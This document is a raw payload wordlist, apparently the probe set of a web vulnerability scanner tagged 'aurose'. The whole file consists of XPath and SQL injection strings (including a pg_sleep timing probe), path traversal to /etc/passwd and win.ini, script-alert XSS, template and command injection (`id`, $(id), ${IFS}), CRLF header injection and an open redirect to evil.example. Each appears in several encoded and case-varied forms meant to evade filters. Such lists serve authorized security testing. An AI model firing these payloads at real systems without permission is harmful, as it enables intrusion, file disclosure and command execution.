' or '1'='1
' or count(//node())>0 or 'a'='a
' or substring(name(/*[1]),1,1)='a' or '1'='1
' or true() or '
" or "1"="1
test
baseline
AUROSE_PROBE
../../../../etc/passwd
..\..\..\..\windows\win.ini
' OR '1'='1
" OR "1"="1
<script>alert(1)</script>
${7*7}
{{7*7}}
`id`
127.0.0.1
http://127.0.0.1
https://example.com
%27%20or%20%271%27%3D%271
%27%20or%20count%28%2F%2Fnode%28%29%29%3E0%20or%20%27a%27%3D%27a
%27%20or%20substring%28name%28%2F%2A%5B1%5D%29%2C1%2C1%29%3D%27a%27%20or%20%271%27%3D%271
%27%20or%20true%28%29%20or%20%27
%22%20or%20%221%22%3D%221
..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
%27%20OR%20%271%27%3D%271
%22%20OR%20%221%22%3D%221
%3Cscript%3Ealert%281%29%3C%2Fscript%3E
%24%7B7%2A7%7D
%7B%7B7%2A7%7D%7D
%60id%60
http%3A%2F%2F127.0.0.1
https%3A%2F%2Fexample.com
' OR COUNT(//NODE())>0 OR 'A'='A
' OR SUBSTRING(NAME(/*[1]),1,1)='A' OR '1'='1
' OR TRUE() OR '
TEST
BASELINE
../../../../ETC/PASSWD
..\..\..\..\WINDOWS\WIN.INI
<SCRIPT>ALERT(1)</SCRIPT>
`ID`
HTTP://127.0.0.1
HTTPS://EXAMPLE.COM
%27%20OR%20COUNT%28%2F%2FNODE%28%29%29%3E0%20OR%20%27A%27%3D%27A
%27%20OR%20SUBSTRING%28NAME%28%2F%2A%5B1%5D%29%2C1%2C1%29%3D%27A%27%20OR%20%271%27%3D%271
%27%20OR%20TRUE%28%29%20OR%20%27
..%2F..%2F..%2F..%2FETC%2FPASSWD
..%5C..%5C..%5C..%5CWINDOWS%5CWIN.INI
%3CSCRIPT%3EALERT%281%29%3C%2FSCRIPT%3E
%60ID%60
HTTP%3A%2F%2F127.0.0.1
HTTPS%3A%2F%2FEXAMPLE.COM
' or '1'%3D'1
' or count(//node())>0 or 'a'%3D'a
' or substring(name(/*[1]),1,1)%3D'a' or '1'%3D'1
" or "1"%3D"1
' OR '1'%3D'1
" OR "1"%3D"1
' OR COUNT(//NODE())>0 OR 'A'%3D'A
' OR SUBSTRING(NAME(/*[1]),1,1)%3D'A' OR '1'%3D'1
' or '1'='1?v=0
' or '1'='1&v=0
%27%20or%20%271%27%3D%271_0
xpath_0
/xpath/0
' or '1'='1%0a0
' or count(//node())>0 or 'a'='a?v=1
' or count(//node())>0 or 'a'='a&v=1
%27%20or%20count%28%2F%2Fnode%28%29%29%3E0%20or%20%27a%27%3D%27a_1
xpath_1
/xpath/1
' or count(//node())>0 or 'a'='a%0a1
' or substring(name(/*[1]),1,1)='a' or '1'='1?v=2
' or substring(name(/*[1]),1,1)='a' or '1'='1&v=2
%27%20or%20substring%28name%28%2F%2A%5B1%5D%29%2C1%2C1%29%3D%27a%27%20or%20%271%27%3D%271_2
xpath_2
/xpath/2
' or substring(name(/*[1]),1,1)='a' or '1'='1%0a2
%2527%2520or%2520%25271%2527%253D%25271
'/**/or/**/'1'='1
' or '1'%3d'1
' or '1'='1?aurose=1
' or '1'='1&aurose=1
%2522%2520or%2520%25221%2522%253D%25221
"/**/or/**/"1"="1
" or "1"%3d"1
" or "1"="1?aurose=1
" or "1"="1&aurose=1
' or contains(name(),'user') or '1'='1
%27%20or%20contains%28name%28%29%2C%27user%27%29%20or%20%271%27%3D%271
%2527%2520or%2520contains%2528name%2528%2529%252C%2527user%2527%2529%2520or%2520%25271%2527%253D%25271
'/**/or/**/contains(name(),'user')/**/or/**/'1'='1
' or contains(name(),'user') or '1'%3d'1
' OR CONTAINS(NAME(),'USER') OR '1'='1
' or contains(name(),'user') or '1'='1?aurose=1
' or contains(name(),'user') or '1'='1&aurose=1
' or count(//*)>0 or '1'='1
%27%20or%20count%28%2F%2F%2A%29%3E0%20or%20%271%27%3D%271
%2527%2520or%2520count%2528%252F%252F%252A%2529%253E0%2520or%2520%25271%2527%253D%25271
'/**/or/**/count(//*)>0/**/or/**/'1'='1
' or count(//*)>0 or '1'%3d'1
' OR COUNT(//*)>0 OR '1'='1
' or count(//*)>0 or '1'='1?aurose=1
' or count(//*)>0 or '1'='1&aurose=1
' or substring(name(/*),1,1)='r' or '1'='1
%27%20or%20substring%28name%28%2F%2A%29%2C1%2C1%29%3D%27r%27%20or%20%271%27%3D%271
%2527%2520or%2520substring%2528name%2528%252F%252A%2529%252C1%252C1%2529%253D%2527r%2527%2520or%2520%25271%2527%253D%25271
'/**/or/**/substring(name(/*),1,1)='r'/**/or/**/'1'='1
' or substring(name(/*),1,1)%3d'r' or '1'%3d'1
' OR SUBSTRING(NAME(/*),1,1)='R' OR '1'='1
' or substring(name(/*),1,1)='r' or '1'='1?aurose=1
' or substring(name(/*),1,1)='r' or '1'='1&aurose=1
' or normalize-space(/)!='' or '1'='1
%27%20or%20normalize-space%28%2F%29%21%3D%27%27%20or%20%271%27%3D%271
%2527%2520or%2520normalize-space%2528%252F%2529%2521%253D%2527%2527%2520or%2520%25271%2527%253D%25271
'/**/or/**/normalize-space(/)!=''/**/or/**/'1'='1
' or normalize-space(/)!%3d'' or '1'%3d'1
' OR NORMALIZE-SPACE(/)!='' OR '1'='1
' or normalize-space(/)!='' or '1'='1?aurose=1
' or normalize-space(/)!='' or '1'='1&aurose=1
') or ('1'='1
%27%29%20or%20%28%271%27%3D%271
%2527%2529%2520or%2520%2528%25271%2527%253D%25271
')/**/or/**/('1'='1
') or ('1'%3d'1
') OR ('1'='1
') or ('1'='1?aurose=1
') or ('1'='1&aurose=1
" ) or ( "1"="1
%22%20%29%20or%20%28%20%221%22%3D%221
%2522%2520%2529%2520or%2520%2528%2520%25221%2522%253D%25221
"/**/)/**/or/**/(/**/"1"="1
" ) or ( "1"%3d"1
" ) OR ( "1"="1
" ) or ( "1"="1?aurose=1
" ) or ( "1"="1&aurose=1
%2527%2520OR%2520%25271%2527%253D%25271
'/**/OR/**/'1'='1
' OR '1'%3d'1
' OR '1'='1?aurose=1
' OR '1'='1&aurose=1
%2522%2520OR%2520%25221%2522%253D%25221
"/**/OR/**/"1"="1
" OR "1"%3d"1
" OR "1"="1?aurose=1
" OR "1"="1&aurose=1
' AND 1=1 --
%27%20AND%201%3D1%20--
%2527%2520AND%25201%253D1%2520--
'/**/AND/**/1=1/**/--
' AND 1%3d1 --
' AND 1=1 --?aurose=1
' AND 1=1 --&aurose=1
' AND 1=2 --
%27%20AND%201%3D2%20--
%2527%2520AND%25201%253D2%2520--
'/**/AND/**/1=2/**/--
' AND 1%3d2 --
' AND 1=2 --?aurose=1
' AND 1=2 --&aurose=1
..%252F..%252F..%252F..%252Fetc%252Fpasswd
../../../../etc/passwd?aurose=1
../../../../etc/passwd&aurose=1
..%255C..%255C..%255C..%255Cwindows%255Cwin.ini
..\..\..\..\windows\win.ini?aurose=1
..\..\..\..\windows\win.ini&aurose=1
%2524%257B7%252A7%257D
${7*7}?aurose=1
${7*7}&aurose=1
%257B%257B7%252A7%257D%257D
{{7*7}}?aurose=1
{{7*7}}&aurose=1
<script>alert(document.domain)</script>
%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
%253Cscript%253Ealert%2528document.domain%2529%253C%252Fscript%253E
<SCRIPT>ALERT(DOCUMENT.DOMAIN)</SCRIPT>
<script>alert(document.domain)</script>?aurose=1
<script>alert(document.domain)</script>&aurose=1
';SELECT pg_sleep(2)--
%27%3BSELECT%20pg_sleep%282%29--
%2527%253BSELECT%2520pg_sleep%25282%2529--
';SELECT/**/pg_sleep(2)--
';SELECT PG_SLEEP(2)--
';SELECT pg_sleep(2)--?aurose=1
';SELECT pg_sleep(2)--&aurose=1
%2560id%2560
`id`?aurose=1
`id`&aurose=1
$(id)
%24%28id%29
%2524%2528id%2529
$(ID)
$(id)?aurose=1
$(id)&aurose=1
${IFS}
%24%7BIFS%7D
%2524%257BIFS%257D
${IFS}?aurose=1
${IFS}&aurose=1
%0d%0aX-Aurose: 1
%250d%250aX-Aurose%3A%201
%25250d%25250aX-Aurose%253A%25201
%0d%0aX-Aurose:/**/1
%0D%0AX-AUROSE: 1
%0d%0aX-Aurose: 1?aurose=1
%0d%0aX-Aurose: 1&aurose=1
https://example.com/?next=https://evil.example
https%3A%2F%2Fexample.com%2F%3Fnext%3Dhttps%3A%2F%2Fevil.example
https%253A%252F%252Fexample.com%252F%253Fnext%253Dhttps%253A%252F%252Fevil.example
https://example.com/?next%3dhttps://evil.example
HTTPS://EXAMPLE.COM/?NEXT=HTTPS://EVIL.EXAMPLE
https://example.com/?next=https://evil.example?aurose=1
https://example.com/?next=https://evil.example&aurose=1
' or '1'='1::var0
%27%20or%20%271%27%3D%271::v0
/xpath/probe/0
" or "1"="1::var1
%22%20or%20%221%22%3D%221::v1
/xpath/probe/1
' or contains(name(),'user') or '1'='1::var2
%27%20or%20contains%28name%28%29%2C%27user%27%29%20or%20%271%27%3D%271::v2
/xpath/probe/2
' or count(//*)>0 or '1'='1::var3
%27%20or%20count%28%2F%2F%2A%29%3E0%20or%20%271%27%3D%271::v3
/xpath/probe/3
' or substring(name(/*),1,1)='r' or '1'='1::var4
%27%20or%20substring%28name%28%2F%2A%29%2C1%2C1%29%3D%27r%27%20or%20%271%27%3D%271::v4
/xpath/probe/4
' or normalize-space(/)!='' or '1'='1::var5
%27%20or%20normalize-space%28%2F%29%21%3D%27%27%20or%20%271%27%3D%271::v5
/xpath/probe/5
') or ('1'='1::var6
%27%29%20or%20%28%271%27%3D%271::v6
/xpath/probe/6
" ) or ( "1"="1::var7
%22%20%29%20or%20%28%20%221%22%3D%221::v7
/xpath/probe/7
' OR '1'='1::var8
%27%20OR%20%271%27%3D%271::v8
/xpath/probe/8
